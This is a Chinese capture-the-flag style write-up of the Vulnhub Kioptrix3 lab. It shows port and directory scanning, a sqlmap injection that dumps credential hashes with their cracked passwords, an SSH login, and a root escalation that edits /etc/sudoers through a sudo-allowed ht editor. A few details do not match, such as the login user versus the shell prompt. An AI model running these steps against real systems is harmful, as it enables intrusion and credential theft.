[Vulnhub] KVM3 (ht编辑器权限提升)

Vulnhub 报告

信息获取

系统 IP:192.168.8.100

服务枚举
Server IP Address Ports Open
192.168.8.100 TCP 22,80

使用 Nmap 扫描:

$ nmap -p- -sV -sC 192.168.8.100 --min-rate 1000

结果:

bash 复制代码
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 04:35 EDT
Nmap scan report for 192.168.8.100 (192.168.8.100)
Host is up (0.0030s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: Ligoat Security - Got Goat? Security ...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.24 seconds

目录枚举

$ dirsearch -u "http://192.168.8.100/"

结果:

bash 复制代码
  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/maptnh/reports/http_192.168.8.100/__24-05-18_04-38-27.txt

Target: http://192.168.8.100/

[04:38:27] Starting:
[04:38:29] 403 -  331B  - /.ht_wsr.txt
[04:38:29] 403 -  334B  - /.htaccess.bak1
[04:38:29] 403 -  334B  - /.htaccess.orig
[04:38:29] 403 -  336B  - /.htaccess.sample
[04:38:29] 403 -  334B  - /.htaccess.save
[04:38:29] 403 -  332B  - /.htaccess_sc
[04:38:29] 403 -  334B  - /.htaccess_orig
[04:38:29] 403 -  332B  - /.htaccessOLD
[04:38:29] 403 -  333B  - /.htaccessOLD2
[04:38:29] 403 -  335B  - /.htaccess_extra
[04:38:29] 403 -  332B  - /.htaccessBAK
[04:38:29] 403 -  325B  - /.html
[04:38:29] 403 -  324B  - /.htm
[04:38:29] 403 -  334B  - /.htpasswd_test
[04:38:29] 403 -  331B  - /.httr-oauth
[04:38:29] 403 -  330B  - /.htpasswds
[04:38:49] 301 -  353B  - /cache  ->  http://192.168.8.100/cache/
[04:38:52] 301 -  352B  - /core  ->  http://192.168.8.100/core/
[04:38:52] 200 -  688B  - /core/fragments/moduleInfo.phtml
[04:38:53] 403 -  324B  - /data
[04:38:53] 403 -  336B  - /data/adminer.php
[04:38:53] 403 -  336B  - /data/autosuggest
[04:38:53] 403 -  333B  - /data/backups/
[04:38:53] 403 -  349B  - /data/DoctrineORMModule/Proxy/
[04:38:53] 403 -  349B  - /data/DoctrineORMModule/cache/
[04:38:53] 403 -  334B  - /data/sessions/
[04:38:53] 403 -  331B  - /data/files/
[04:38:53] 403 -  325B  - /data/
[04:38:53] 403 -  331B  - /data/cache/
[04:38:53] 403 -  331B  - /data/debug/
[04:38:53] 403 -  330B  - /data/logs/
[04:38:53] 403 -  329B  - /data/tmp/
[04:38:57] 200 -   23KB - /favicon.ico
[04:38:58] 301 -  355B  - /gallery  ->  http://192.168.8.100/gallery/
[04:39:10] 301 -  355B  - /modules  ->  http://192.168.8.100/modules/
[04:39:10] 200 -    2KB - /modules/
[04:39:15] 301 -  358B  - /phpmyadmin  ->  http://192.168.8.100/phpmyadmin/
[04:39:16] 401 -  519B  - /phpmyadmin/scripts/setup.php
[04:39:16] 200 -    8KB - /phpmyadmin/
[04:39:16] 200 -    8KB - /phpmyadmin/index.php
[04:39:21] 403 -  334B  - /server-status/
[04:39:21] 403 -  333B  - /server-status
[04:39:25] 301 -  353B  - /style  ->  http://192.168.8.100/style/
[04:39:30] 200 -   18B  - /update.php

Task Completed

SQL 注入

访问目标:http://192.168.8.100/gallery/

使用 searchsploit 搜索 Gallarific存在的历史CVE

$ searchsploit Gallarific

结果:

--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gallarific - 'search.php?query' Cross-Site Scripting                                                                       | php/webapps/31369.txt
Gallarific - 'user.php' Arbirary Change Admin Information                                                                  | php/webapps/8796.html
Gallarific - Multiple Script Direct Request Authentication Bypass                                                          | php/webapps/31370.txt
Gallarific 1.1 - '/gallery.php' Arbitrary Delete/Edit Category                                                             | php/webapps/9421.txt
GALLARIFIC PHP Photo Gallery Script - 'gallery.php' SQL Injection                                                          | php/webapps/15891.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------

使用: php/webapps/15891.txt

$ cat /usr/share/exploitdb/exploits/php/webapps/15891.txt

获取数据库

$ sqlmap -u "http://192.168.8.100/gallery/gallery.php?id=1" --dbs --batch

$ sqlmap -u "http://192.168.8.100/gallery/gallery.php?id=1" -D gallery --tables --batch

$ sqlmap -u "http://192.168.8.100/gallery/gallery.php?id=1" -D gallery -T dev_accounts --dump --batch

+----+---------------------------------------------+------------+
| id | password                                    | username   |
+----+---------------------------------------------+------------+
| 1  | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   | dreg       |
| 2  | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret |
+----+---------------------------------------------+------------+

SSH

$ ssh dreg@192.168.8.100

3.2.1.5 Local 内容

loneferret@Kioptrix3:~$ cat /home/loneferret/Local.txt

u28dt2i0

权限提升

loneferret@Kioptrix3:~$ sudo -l

结果:

User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht

Found that the file /usr/local/bin/ht has the SUID bit set.

loneferret@Kioptrix3:~$ ls -la /usr/local/bin/ht

尝试运行:
loneferret@Kioptrix3:~$ /usr/local/bin/ht

结果:
Error opening terminal: xterm-256color.

使用命令 export TERM=xterm 以确保终端仿真器能够正确地处理和显示终端应用程序的输出。

loneferret@Kioptrix3:~$ export TERM=xterm

loneferret@Kioptrix3:~$ sudo /usr/local/bin/ht

我们现在使用的是root权限运行ht编辑器来编辑文档。

loneferret@Kioptrix3:~$ sudo /usr/local/bin/ht /etc/sudoers

F3 and /etc/sudoers and ENter

F2 保存文件

loneferret@Kioptrix3:~$ sudo /bin/bash

Proot 内容

root@Kioptrix3:~# cat /root/Proot.txt

d2ua8u2yd

相关推荐
Mortal_hhh11 小时前
VScode的C/C++点击转到定义,不是跳转定义而是跳转声明怎么办?(内附详细做法)
ide·vscode·stm32·编辑器
电子云与长程纠缠20 小时前
UE5.3中通过编辑器工具创建大纲菜单文件夹
java·ue5·编辑器
lucky九年21 小时前
vscode翻译插件
ide·vscode·编辑器
真·Wild·攻城狮1 天前
【码农日常】Vscode Clangd初始化失败(Win10)
ide·vscode·编辑器
七灵微1 天前
【测试】【Debug】vscode中同一个测试用例出现重复
ide·vscode·编辑器
4U2472 天前
Linux入门之vim
linux·编辑器·vim·命令模式·底行模式
Liquor14192 天前
vim 编辑器
java·linux·c语言·开发语言·python·编辑器·vim
skywalk81632 天前
三周精通FastAPI:33 在编辑器中调试
python·编辑器·fastapi
188_djh3 天前
# vim那些事...... vim删除文件全部内容
linux·ubuntu·centos·编辑器·vim·vi·vim删除文件全部内容
虞书欣的63 天前
Python小游戏22——吃豆豆小游戏
python·算法·游戏·编辑器·pygame